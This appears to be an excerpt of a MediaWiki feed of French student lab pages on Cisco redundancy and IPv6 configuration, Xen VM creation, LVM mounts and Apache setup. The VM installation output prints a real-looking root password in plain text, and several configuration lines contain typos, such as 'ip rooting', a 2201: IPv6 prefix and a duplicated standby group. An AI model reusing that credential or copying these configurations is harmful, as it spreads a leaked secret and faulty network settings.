   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51379</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51379"/>
				<updated>2019-11-28T18:16:49Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Paquetages nécessaires pour le serveur DNS bind */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
==== Paquetages nécessaires pour RAID5 ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
